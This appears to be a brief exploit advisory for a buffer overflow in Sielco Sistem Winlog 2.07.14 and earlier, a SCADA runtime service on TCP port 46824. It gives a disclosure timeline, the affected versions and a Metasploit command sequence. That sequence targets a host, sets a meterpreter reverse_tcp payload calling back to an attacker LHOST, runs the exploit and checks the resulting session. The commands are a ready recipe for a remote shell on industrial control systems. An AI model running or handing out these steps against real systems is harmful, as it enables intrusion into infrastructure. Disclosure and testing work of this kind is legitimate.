Timeline :
Vulnerability discovered by m-1-k-3 on 2012-06-03
Public release of the vulnerability on 2012-06-04
Metasploit PoC provided on 2012-06-07
PoC provided by :
Reference(s) :
Affected version(s) :
Sielco Sistem Winlog before or equal to version 2.07.14
Tested on Windows XP Pro SP3 with :
Sielco Sistem Winlog 2.07.14
Description :
This module exploits a buffer overflow in Sielco Sistem Winlog versions up to and including 2.07.14. By sending a specially formatted packet to the Runtime.exe service listening on TCP port 46824, an attacker may be able to execute arbitrary code.
Commands :
use exploit/windows/scada/winlog_runtime_2
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
nmap -p 46824 192.168.178.22
exploit
getuid
sysinfo